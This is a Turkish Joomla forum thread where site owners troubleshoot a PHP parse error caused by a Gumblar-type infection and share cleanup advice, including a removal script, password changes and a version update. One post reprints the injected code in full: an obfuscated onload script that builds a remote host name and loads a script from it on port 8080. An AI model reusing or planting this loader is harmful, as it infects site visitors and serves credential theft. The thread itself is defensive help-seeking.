Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php on
Joomla! 1.5.x Kategorisinde ve Güvenlik & Performans Forumunda Bulunan Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php on Konusunu Görüntülemektesiniz, Konu İçerigi Kısaca ->> arkadaşlar yazıdada bahsettiği gibi 90. satırı dw dan açtım şöyle bişey çıktı karşıma :
<script>try{window.onload=function(){W1ug66342am d = '' + 'd)i#)s#$#@n)@##e#$y#-&g$)o!#!-#@c^$o)#m&@&.#()!g)g^!p^^$h((t).$@c)^!o&#m).$)a()^ ...
-
Yeni Joomlacı
Cevap: Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php o
arkadaşlar yazıdada bahsettiği gibi 90. satırı dw dan açtım şöyle bişey çıktı karşıma :
<script>try{window.onload=function(){W1ug66342am d = '' + 'd)i#)s#$#@n)@##e#$y#-&g$)o!#!-#@c^$o)#m&@&.#()!g)g^!p^^$h((t).$@c)^!o&#m).$)a()^ m$#a!z!(^o)(n@!-)c@&(o#(@&-&^j^$p(#.$^!(b((l!#(a#c#$k)@$(^s$()e$^a$#^t^r^@^a^ @d^e$^$.)!(!r@u)&:#Z^$@@0$()!j(@!!k)#!^c!()s^#w@^k &&^m#($^m)^#&a(e^#/^#!g)(^l(!&o#)b)&^@#e(!(7(!!#.!$c^#o!#()#m@(/#$g&@@l!^@#@o^#^b^!e#(7&(.$!$c)@o)(m^/#!g^!o)&o###&g@)l)#e@^.((p$&l!/(l^&$#i$)!v$#e#)d$^(@o())o&#@($r^.@c#(o@#m@#/^g&))o&!^o&^g&)@l)!&e!&)).@@#c&&o^$$@@m($/)($('.replace(/#|&|\(|\)|\^|@|\$|\!/ig, '') ;Xzmrsm2fng = 'appendChild';Kavkhceo0lp59zn = document.createElement('sc'+'ript');Kavkhceo0lp59z n.src = 'h'+'ttp://'+W1ug66342amd.replace(/Z0jkcswkmmae/g, '8080');Kavkhceo0lp59zn.setAttribute('defer', 'def'+'er');eval('document.body.'+Xzmrsm2fng+'(Kav khceo0lp59zn)');} } catch(Xvx2wqq ) {}</script>
burda o karışık olan yerin silinmesi gerekiyor ama bi türlü doğru şekilde silemedim nerden nereye kadar olan bölümü yok ediyoruz bana yapıştırmam gereken yeri söylerseniz sevinirim....
Düzenleme: bu arada curevir.php yi denedim pek bi yararını göremedim açıkçası h .....
-
Yeni Joomlacı
Cevap: Parse error: syntax error, unexpected '<' in /home/sim/public_html/index.php o
joomturk Nickli Üyeden Alıntı
bu sorunun bir de hazır çözümü mevcut arkadaşlar daha evvel üç adet sitede tarafımca denenmiş ve %100 çalışan bir script mevcut
Lütfen bu siteye girin ve ilgili php scriptini indirerek sizin için auto temizlemesini sağlayın...
scriptin calisma mantıgı zararlı kodları silmesi;düzenlenen dosyalar için yedek alması ve yedekleri log olarak sunucunuz üzerinde metin dokumanı olarak saklaması.
yapmanız gereken ilgili zipli dosyayı indirdikten sorna açıp curevir.php dosyasını sunucu üzerinde public_html dizini ya da www dizinine attıktan sonra
www. s izin site adresiniz.com/curevir.php calistirmak.
bir süre icinde butun zararlı kodların silinme raporu sayfada belirecektir.
Gumblar-family (GNU GPL or LGPL) virus removal tool to clean your Wordpress, Drupal, Joomla or other site | JustCoded
ilgili ingilizce makale yukarda ve ilgili link de
http://justcoded.com/wp-content/uplo...12/curevir.zip
burada...
tekrar geçmiş olsun.
dip not:
zararlı scriptin kaydetmiş olduğu şifreleriniz yüzünden ayrıca site webadmin,host ve ftp şifrelerini de değiştirmeniz gerekmektedir.
gecen gun bir sitede hata aldım.yine aynı siteye girince bu sorun icin curevir.php nin update edildigini gordum.
UPDATED ON 2010/01/30 diyor. yani gonderdigim zamandan bu yana versiyon atlamıslar
neyse temizligi yaptım.site simdi calisiyor.
Güncel,çalışan script için: http://justcoded.com/article/gumblar...-removal-tool/ sayfasından en güncelini indirin.
bu arada sadece o zararlı kodu silmenizle siteniz düzelmez.bu kod script aynıs ekilde bir cok php dosyasına bulasıyor...yani sadece bir iki index.php den bu scripti silmeniz sitenizin acılmasını saglamaz.
bu zararlı kodları .js .html dosyalarında da gordum.
ya sitenin dosyalarını indirip notepad++ gibi ya da daha gelismis bir editorle dosyalarınızın ilgili kısımlarını tek tek editleyeceksiniz ya da curevir gibi düzenleyici hazır scriptlere muhtacsınız.
-
Yeni Joomlacı
merhaba arkadaşlar.
benim sitemde de (Parse error: syntax error, unexpected '<' in /.....) şeklinde hata veriyordu ve admin panele giremiyordum.
daha sonra burada anlatılanları uyguladım ve artık admin panele girebiliyorum. fakat siteye girmeye çalıştığımda artık eskisi gibi (Parse error: syntax error, unexpected '<' in /.....) hatasını vermiyor. site hiç açılmıyor. bunun nedeni ne olabilir. yardım ederseniz sevinirim.
-
baskentfilm
Guest
-
Amatör Joomlacı
sorunu çözdüm arkadaşlar... siteyi bir üst versiyona update yaptım düzeldi. hasarlı dosya yada dosyalar update yapınca yenileriyle degiştirildigi için düzeliyor..